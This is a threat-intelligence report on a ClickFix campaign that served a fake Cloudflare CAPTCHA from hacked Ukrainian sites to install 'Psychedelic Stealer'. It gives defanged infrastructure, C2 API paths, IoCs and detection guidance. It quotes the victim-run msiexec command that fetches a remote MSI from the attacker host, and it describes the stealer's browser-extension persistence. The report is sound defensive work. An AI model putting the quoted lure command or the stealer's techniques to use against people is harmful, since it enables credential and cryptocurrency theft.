Overview
Between September 9 and September 14, 2026, an operator compromised at least six legitimate Ukrainian small-business websites and used them to serve a fake Cloudflare verification page. The page did not exploit anything. It asked the visitor to press three keys.
That is the whole initial-access story, and it worked 79 times out of 426 clicks.
The campaign is a textbook ClickFix chain with one detail that matters more than the rest: the command the page put on the victim's clipboard was not an encoded PowerShell one-liner. It was msiexec.exe, fetching a remote MSI over HTTPS, dressed up with a Cyrillic installer property so that anything the victim glimpsed during installation still read as CAPTCHA verification. Arctic Wolf Labs, which published the analysis on September 24, flags this explicitly: detections scoped to encoded PowerShell miss this chain entirely.
The payload, a 64-bit Windows stealer the operator named psychedeliclove.exe and tagged internally as Psychedelic, is more capable than the delivery mechanism suggests. It does not simply grab and exfiltrate browser credential databases. It terminates browser processes, writes its own browser extension plus a native-messaging bridge into the profile, establishes a logon-triggered scheduled task, and then polls a REST API for tasking that can execute EXE, COM, BAT, CMD, MSI or PowerShell attachments. It is a stealer with a persistent agent bolted to it.
This article walks the chain end to end, the panel telemetry the operator left exposed, the infrastructure, and detection guidance by telemetry layer.
Threat Actor Profile
Arctic Wolf Labs has not attributed this campaign to a named threat actor, and neither do we. What exists is a consistent set of language and tooling artifacts:
Russian-language operator context. The traffic-direction-system panel behind the lure is branded РУБЛЁВКА TDS (Rublevka TDS) -- a reference to an affluent district west of Moscow. The lure page's HTML declares lang="ru" and carries Russian-language code comments, while the text rendered to the victim is Ukrainian. The operator built the page in one language and shipped it in another.
Ukrainian targeting. Compromised sites are Ukrainian small businesses. The lure text is Ukrainian. Panel telemetry concentrates overwhelmingly in Ukraine. The targeting is geographic and opportunistic rather than sectoral, which is worth stating plainly because the victim sector list reads almost randomly: a hair-treatment clinic, a scale-model manufacturer, a specialist bookseller and publisher, a psychological facility, a tool retailer, and an automotive retailer. Nothing about that list suggests intelligence-driven target selection. It suggests whatever CMS installations were reachable.
Financial motivation. The payload's collection priorities settle the question. Alongside browser credentials it targets MetaMask, Trust Wallet, OKX Wallet and SafePal browser extensions, plus Exodus, Atomic Wallet, Electrum, Bitcoin Core and Litecoin Core desktop wallets. That is a crimeware target list, not an espionage one.
A possible adjacent cluster. Blackpoint Cyber, reporting in the same window on a separate ClickFix chain, documented two components -- RemotePanel (a hVNC-capable remote-access tool masquerading as the Windows Time service, using a CMSTPLUA COM object UAC bypass and resolving its C2 through a BNB Smart Chain contract) and BoundSiphon (an in-memory stealer that reaches secrets protected by Chromium App-Bound Encryption). Blackpoint's researchers Nevan Beal, Sam Decker and Andi Ursry recovered artifacts suggesting a Russian-speaking development environment, including source-code checks that avoid systems with Russian keyboard layouts, and linked the stealer to one distributed in May 2026 through five malicious NuGet packages. These are not confirmed to be the same operator as Psychedelic Stealer. They are a parallel cluster worth tracking, and the shared ClickFix-plus-blockchain-C2 pattern is the reason to note it.
Targets
Panel telemetry, which the operator left readable, gives an unusually precise picture of campaign reach:
| Country | Views | Clicks | Completions |
|---|---|---|---|
| Ukraine | 446 | 351 | 71 |
| United States | 31 | 12 | 1 |
| Poland | 16 | 12 | 1 |
| Germany | 12 | 11 | 1 |
| Canada | 7 | 6 | 0 |
| 27 others | 45 | 34 | 5 |
| Total | 557 | 426 | 79 |
Ukraine accounts for 80 percent of views and 90 percent of completions. Thirty-two countries appear in total, which is what incidental traffic to compromised Ukrainian business sites looks like rather than evidence of broader targeting.
The conversion figures deserve attention on their own. Of 557 people who saw the fake CAPTCHA, 426 clicked it, and 79 completed the flow. A 14 percent completion rate on an attack that requires the victim to manually open the Windows Run dialog and paste a command is a meaningful data point for anyone arguing that ClickFix is too user-dependent to be a serious threat. It is not.
Infrastructure
| Asset | Value | Role |
|---|---|---|
| Injected script | hxxps://fsputnik[.]com/tds/tracker[.]js | Loaded by iframe injected into compromised sites |
| Lure host | uasputnik[.]com | Fake CAPTCHA page and MSI hosting |
| Lure page | hxxps://uasputnik[.]com/sputnik.html | Fake Cloudflare verification, site= variants observed |
| Payload broker | /admin777111777.php?api=get_payload&domain=uasputnik[.]com | Returns the clipboard command at request time |
| Lure host IP | 176.53.159[.]40 | Sept 9 to 14, 2026. AS154383 (ZORNTECH WEB SOLUTIONS) |
| Payload host | hxxp://107.175.82[.]242:9000/wilow/psychedeliclove.exe | Stealer download, decrypted from MSI |
| C2 | hxxp://193.178.159[.]128:8080 | REST tasking and exfiltration, X-API-Key header |
| Panel branding | РУБЛЁВКА TDS | Operator-facing traffic-direction system |
uasputnik[.]com was registered on September 9, 2026 at 17:02:25 UTC and updated roughly three and a half hours later. The first lure URLs referencing specific compromised Ukrainian sites appeared on September 12. This is disposable infrastructure operated on a days-long timescale, which has a direct consequence for detection: the domains and IPs in the table above are already decaying, while the implant's own hardcoded API paths are not.
The clipboard command is fetched, not hardcoded. The lure page retrieves it from admin777111777.php on each load and only replaces its in-memory default of "1" if the response exceeds five characters. The operator can therefore change the delivered command -- or switch payloads entirely -- without touching the injected script on any compromised site. Seven MSI filenames were already observed rotating on the same host: elita.msi, miks.msi, astra.msi, harbor.msi, neon.msi, sova.msi, vyse.msi.

Kill Chain: Stage by Stage
Stage 1 -- Compromised Site and Injected Iframe
The operator injected an iframe into legitimate Ukrainian business websites. The iframe loads hxxps://fsputnik[.]com/tds/tracker[.]js, placing all subsequent logic on attacker-controlled infrastructure while the victim's address bar continues to show a site they have reason to trust. Arctic Wolf does not specify the CMS vulnerability or credential path used for the initial site compromises.
Stage 2 -- The Fake Cloudflare Verification Page
The page imitates a Cloudflare interstitial with specific attention to the details a suspicious user might check:
- A randomly generated hexadecimal "Ray ID" on each load, mimicking Cloudflare's own request identifier.
- A fixed "visitor identifier" string,
34as77, positioned as a tracking element. - An approximately 35-second delay before the "Done" button becomes clickable.
That delay is the cleverest part of the design, and it is worth being precise about why. The page cannot verify that the victim actually ran anything. There is no callback, no beacon from the host, no confirmation. The 35 seconds is pure theater: it is long enough that a victim who has genuinely opened the Run dialog and pasted the command will have done so before the button enables, which makes the sequence feel like verification. The page then reports one of three events back to the panel -- view on load, click on CAPTCHA interaction, complete on pressing the enabled Done button -- and sends a bp-reload-parent message to the parent frame.
Those three events are exactly the columns in the telemetry table above. The "completions" figure is therefore not a count of infections. It is a count of people who waited out the timer.
Stage 3 -- Clipboard Write and the Run Dialog
On click, the page executes report('click'); copyToClipboard(currentPayload);, writing the remotely fetched command into an off-screen text element and copying it, then displaying Windows Run instructions. The victim presses Win+R, pastes, and presses Enter.
The command:
Msiexec.exe /i "hxxps://uasputnik[.]com/elita.msi" /passive ORG_NOTE="Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот."
Two design choices carry weight here. /passive suppresses the installer interface except for a progress bar. ORG_NOTE is a non-standard public MSI property the operator set to the Ukrainian string "Protection from automated requests… I confirm I am not a robot," so that whatever the victim does see remains consistent with the CAPTCHA fiction.
This is the stage that defeats PowerShell-focused detection. There is no powershell.exe, no -enc, no mshta, no curl. There is a signed Microsoft binary doing exactly what it is designed to do, pointed at a URL.
Stage 4 -- MSI Execution and Payload Retrieval
The MSI (elita.msi, SHA-256 38e90aff...) retrieves and decrypts the stealer from hxxp://107.175.82[.]242:9000/wilow/psychedeliclove.exe (SHA-256 06f43469...), a 64-bit Windows executable.
Stage 5 -- Persistence
The implant creates a logon-triggered scheduled task named psychedelicloveUtils, via a routine Arctic Wolf located at address 0x140018870. A single named scheduled task is the entire persistence story here, which is notably less layered than families like CLOSEDQUORUM that stack three independent mechanisms. It is also, consequently, easier to find and easier to remove.
Stage 6 -- Browser Component Installation
This stage is what separates Psychedelic Stealer from a commodity grabber. The implant:
- Terminates selected browser processes.
- Extracts an embedded extension archive into browser profile directories.
- Replaces
<<BP_INSTALLER_HWID>>placeholders in the extension with the victim's hardware identifier. - Creates a native-messaging bridge registered as
com.lunex.explorer, withhost.ps1andhost.batas its components andcom.lunex.explorer.jsonas the manifest.
A native-messaging host is a legitimate Chromium feature that lets an extension talk to a local executable. Abused this way it gives the operator an in-browser foothold that survives the browser restart the implant just forced, and that reads browser state from inside the browser's own trust boundary rather than from its encrypted-at-rest files on disk. A recurring background routine revisits the extension operations before each C2 poll, so removing the extension without removing the implant accomplishes nothing.
Stage 7 -- Collection
Browser credentials (routine 0x140008da0, steal_browser_passwords): Chrome, Edge, Brave, Opera, Opera GX, Vivaldi and Yandex. Records carry bot_id, browser, profile, URL, username and decrypted password.
Browser tokens (routine 0x140009950, steal_browser_tokens): reads the Chromium Web Data database via a temporary copy named wd_tmp.db, extracting service, gaia_id and token fields.
Wallets: browser-extension wallets (routine 0x14000a8a0) via IndexedDB and Local Extension Settings paths -- MetaMask, Trust Wallet, OKX Wallet, SafePal. Desktop wallets (routine 0x14000ab60) -- Exodus, Atomic Wallet, Electrum, Bitcoin Core, Litecoin Core.
Host profile: computer name, username, OS version and architecture, CPU and core count, memory, GPU, disk size, timezone, language, screen details, MAC address, administrator status, antivirus product, installed browsers.
Stage 8 -- C2 Tasking and Exfiltration
All traffic goes to hxxp://193.178.159[.]128:8080 with an X-API-Key header:
| Path | Function |
|---|---|
/api/v1/checkin | Host registration and profile submission |
/api/v1/agent/config | Configuration retrieval |
/api/v1/agent/ping?hwid=%s | Heartbeat |
/api/v1/agent/tasks?hwid=%s | Task retrieval |
/api/v1/agent/tasks/%llu/ack | Task acknowledgment |
/api/v1/ext/passwords | Password submission |
/api/v1/ext/tokens | Token submission |
/api/v1/ext/wallets | Wallet data submission |
%s/d/%s | Task attachment retrieval |
Task attachments may be EXE, COM, BAT, CMD, MSI or PowerShell, and local task state is tracked in executed_tasks.json. An infected host is therefore not merely a set of stolen credentials. It is an access point the operator can re-tool at will, and that is how any incident involving this family should be scoped.
Timeline
| Date (UTC) | Event |
|---|---|
| 2026-05 | Blackpoint links a related stealer to five malicious NuGet packages (adjacent cluster, not confirmed same operator). |
| 2026-09-09 17:02:25 | uasputnik[.]com registered. |
| 2026-09-09 ~17:05 | Domain record updated, roughly 3.5 hours after registration. |
| 2026-09-09 to 09-14 | Domain resolves to 176.53.159[.]40 (AS154383, ZORNTECH WEB SOLUTIONS). |
| 2026-09-12 | Lure URLs referencing a Ukrainian scale-model manufacturer and a publisher observed. |
| 2026-09-13 | Lure URL referencing a hair-treatment clinic observed. |
| 2026-09-24 13:00:18 | Arctic Wolf Labs publishes the analysis. |
| 2026-09-24 | The Hacker News, Security Affairs and Techzine cover it; Blackpoint's RemotePanel/BoundSiphon reporting surfaces in the same window. |
Detection Guidance
The organizing principle: the infrastructure is disposable, the API surface is not. The domains registered on September 9 may already be dead. The /api/v1/ext/passwords path is compiled into the binary.
Process-Level Detections (Windows EDR / Security Event Log)
msiexec.exe with a remote http(s) MSI path. This is the durable primitive. In a managed estate, software deployment references a UNC path, a local cache, or an SCCM/Intune content location -- not a bare URL. Baseline your msiexec command lines; the legitimate set is usually small enough to allowlist.
Any MSI install carrying an ORG_NOTE property. ORG_NOTE is non-standard, and setting it on a remote install is not something enterprise deployment tooling does. Match on ORG_NOTE= rather than the Cyrillic value, which arrives percent- or UTF-16-encoded depending on capture and which the operator can change without changing the technique.
msiexec.exe parented by explorer.exe. The Run dialog is an explorer.exe child. Combined with a remote MSI path this is close to a ClickFix signature in its own right, and generalizes beyond this campaign.
Scheduled task creation matching psychedelicloveUtils. Campaign-scoped and expected to decay, but zero-false-positive while it lasts.
RunMRU registry content. The typed command lands in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. This is the single best post-hoc ClickFix artifact for incident response and is worth a dedicated hunt across any host suspected of exposure, whether or not this family is involved.
Network-Level Detections (Web Proxy)
/api/v1/ext/passwords, /api/v1/ext/tokens, /api/v1/ext/wallets. Nothing legitimate in an enterprise posts to these paths. Treat a single hit as confirmed credential theft in progress, not as a lead to investigate.
/api/v1/agent/ping?hwid= and /api/v1/agent/tasks?hwid=. Same reasoning, qualified by the hwid parameter. Note that bare /api/v1/checkin is generic enough that some legitimate device-management and monitoring agents use it -- qualify that one against the destination domain before escalating.
/admin777111777.php and api=get_payload. Operator-chosen filename, effectively a fingerprint of the TDS.
/tds/tracker.js on an unexpected host. Catches the injection stage on a site the user had every reason to trust.
Requests to psychedeliclove.exe or the /wilow/ path. Per Arctic Wolf, escalate on the executable URL rather than the lure view: a lure view proves the victim saw a CAPTCHA, while the executable request means the command ran.
Correction to the source guidance. Arctic Wolf's detection-guidance section writes the C2 as
178.159.128[:]8080, which is not a valid IPv4 address. The correct value from their own infrastructure section is193.178.159[.]128:8080. Do not propagate the truncated form into watchlists.
Identity and Post-Compromise Scoping
Every credential in every browser profile on an affected host is compromised, along with GAIA session tokens -- which means password rotation alone is insufficient; sessions must be invalidated. Wallet seed phrases and keys reachable from the targeted extensions and desktop applications should be treated as compromised and the assets moved, not merely re-secured.
Because the implant retrieves and executes arbitrary tasking, an infected host must be scoped as a general-purpose foothold of unknown duration rather than as a one-shot credential theft. The executed_tasks.json file on the host is the starting point for establishing what actually ran.
Host Artifact Hunt
psychedelicloveUtils (scheduled task), com.lunex.explorer.json, host.ps1, host.bat, wd_tmp.db, executed_tasks.json, and any browser extension containing a <<BP_INSTALLER_HWID>> placeholder or a substituted hardware ID.
Indicators of Compromise
Network
| Type | Value | Notes |
|---|---|---|
| Domain | uasputnik[.]com | Lure and MSI host. Registered 2026-09-09 |
| Domain | fsputnik[.]com | Injected tracker.js host |
| URL | hxxps://fsputnik[.]com/tds/tracker[.]js | Iframe-injected loader |
| URL | hxxps://uasputnik[.]com/sputnik.html | Fake Cloudflare CAPTCHA page. Securonix Reviewed & Validated |
| URL | hxxps://uasputnik[.]com/elita.msi | First-stage MSI. Securonix Reviewed & Validated |
| URL path | /admin777111777.php?api=get_payload&domain= | Clipboard-command broker |
| URL | hxxp://107.175.82[.]242:9000/wilow/psychedeliclove.exe | Stealer download. Securonix Reviewed & Validated |
| IP | 107.175.82[.]242 | Payload host, port 9000. Securonix Reviewed & Validated |
| IP | 193.178.159[.]128 | C2, port 8080. Securonix Reviewed & Validated |
| IP | 176.53.159[.]40 | Hosted uasputnik[.]com, AS154383 ZORNTECH WEB SOLUTIONS |
| MSI filenames | elita.msi, miks.msi, astra.msi, harbor.msi, neon.msi, sova.msi, vyse.msi | Rotating on the same host |
File Hashes (SHA-256)
| File | SHA-256 |
|---|---|
elita.msi | 38e90affe37342ee36917cdc535fe9bf04589afa8430eb8d1ba1016adcfc1878 |
psychedeliclove.exe | 06f434695f93d7fd11eeff71358ff69fed79d310a66d993bbcc4ff979c117c90 |
Host Artifacts
| Type | Value | Notes |
|---|---|---|
| Scheduled task | psychedelicloveUtils | Logon trigger. Created by routine 0x140018870 |
| Native-messaging host | com.lunex.explorer | Browser bridge |
| File | com.lunex.explorer.json | Native-host manifest |
| File | host.ps1, host.bat | Bridge components |
| File | wd_tmp.db | Temporary copy of Chromium Web Data database |
| File | executed_tasks.json | Local task-state tracking |
| Placeholder string | <<BP_INSTALLER_HWID>> | Replaced with victim hardware ID in the dropped extension |
| Config tag | Psychedelic | Hardcoded in the implant |
| Registry | HKCU\...\Explorer\RunMRU containing an msiexec command | ClickFix paste artifact |
MITRE ATT&CK Mapping
| Tactic | Technique | Name | Observed As |
|---|---|---|---|
| Resource Development | T1584.004 | Compromise Infrastructure: Server | Six-plus compromised Ukrainian business websites |
| Initial Access | T1189 | Drive-by Compromise | Iframe-injected lure on trusted sites |
| Execution | T1204.002 | User Execution: Malicious File | Victim pastes and runs the command via Win+R |
| Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Run dialog command execution |
| Defense Evasion | T1218.007 | System Binary Proxy Execution: Msiexec | Signed msiexec.exe fetching a remote MSI |
| Defense Evasion | T1036 | Masquerading | ORG_NOTE Cyrillic CAPTCHA text inside the installer UI |
| Command and Control | T1105 | Ingress Tool Transfer | MSI retrieves psychedeliclove.exe from a second host |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | psychedelicloveUtils, logon trigger |
| Persistence | T1176 | Browser Extensions | Extension plus com.lunex.explorer native-messaging bridge |
| Credential Access | T1555.003 | Credentials from Password Stores: Web Browsers | Seven Chromium-family browsers |
| Credential Access | T1539 | Steal Web Session Cookie | GAIA token extraction from Web Data database |
| Credential Access | T1555 | Credentials from Password Stores | Four extension wallets, five desktop wallets |
| Discovery | T1082 | System Information Discovery | Full host profile including AV and installed browsers |
| Discovery | T1518.001 | Software Discovery: Security Software Discovery | Antivirus product enumeration |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | REST API on port 8080 with X-API-Key |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | /api/v1/ext/* submissions |
Key Takeaways
ClickFix works, and the conversion numbers are not marginal. 426 clicks and 79 completions out of 557 views, on an attack requiring the victim to manually open the Run dialog and paste a command. Anyone treating ClickFix as a low-yield technique because it depends on user action should look at that 14 percent completion rate again.
msiexec.exe is the detection gap. Most ClickFix detection content in circulation keys on encoded PowerShell, mshta, or curl. This campaign uses a signed Microsoft installer binary and a URL. Arctic Wolf says so directly, and it is the single most actionable finding in the report: audit your ClickFix coverage for whether it fires on msiexec at all.
The 35-second delay is social engineering, not verification. The page has no way to confirm execution. Understanding this matters for triage, because it means the panel's "completion" count is not an infection count, and a lure-page view in your proxy logs is not an infection either. Escalate on the payload request or the /api/v1/ traffic, not on the CAPTCHA view.
Browser extension plus native-messaging bridge is the part to watch. Dropping an extension and registering a native-messaging host moves the operator inside the browser's trust boundary, where App-Bound Encryption and at-rest protections stop helping. Blackpoint's BoundSiphon reporting points the same direction from a different chain. This is a pattern, not a one-off.
Rotate sessions, not just passwords. Stolen GAIA tokens survive a password change. So does an unremoved native-messaging host.
Treat the host as a foothold, not an incident that already ended. Arbitrary EXE/COM/BAT/CMD/MSI/PowerShell tasking means the stealer was the first thing that ran, not necessarily the last. executed_tasks.json is where scoping starts.
References
-
Arctic Wolf Labs. (2026, September 24). The Psychedelic Stealer: When a CAPTCHA Becomes an Installer. Arctic Wolf. https://arcticwolf.com/resources/blog/psychedelic-stealer-fake-clickfix-captcha-targets-ukraine/
-
Lakshmanan, R. (2026, September 24). Hacked Ukrainian Sites Serve Fake Cloudflare ClickFix Lures for Psychedelic Stealer. The Hacker News. https://thehackernews.com/2026/09/hacked-ukrainian-sites-serve-fake.html
-
Security Affairs. (2026, September). ClickFix Campaign Abuses Trusted Websites to Deploy Psychedelic Stealer. https://securityaffairs.com/199731/malware/clickfix-campaign-abuses-trusted-websites-to-deploy-psychedelic-stealer.html
-
Techzine Global. (2026, September). Arctic Wolf: Psychedelic stealer exploits CAPTCHA as an installer. https://www.techzine.eu/news/security/144520/arctic-wolf-psychedelic-stealer-exploits-captcha-as-an-installer/
-
dev.ua. (2026, September). Hackers are hacking Ukrainian websites to spread new Psychedelic malware via fake Cloudflare verification. https://dev.ua/en/news/khakery-zlamuiut-ukrainski-saity-1790327470
-
Matrice Digitale. (2026, September 24). Psychedelic Stealer usa siti ucraini violati e falsi CAPTCHA Cloudflare. https://www.matricedigitale.it/2026/09/24/psychedelic-stealer-falsi-captcha/
-
MITRE ATT&CK. System Binary Proxy Execution: Msiexec (T1218.007). https://attack.mitre.org/techniques/T1218/007/
-
MITRE ATT&CK. Browser Extensions (T1176). https://attack.mitre.org/techniques/T1176/
-
MITRE ATT&CK. Exfiltration Over C2 Channel (T1041). https://attack.mitre.org/techniques/T1041/
-
Malwarebytes. (2025, March). Fake CAPTCHA websites hijack your clipboard to install information stealers. https://www.malwarebytes.com/blog/news/2025/03/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers
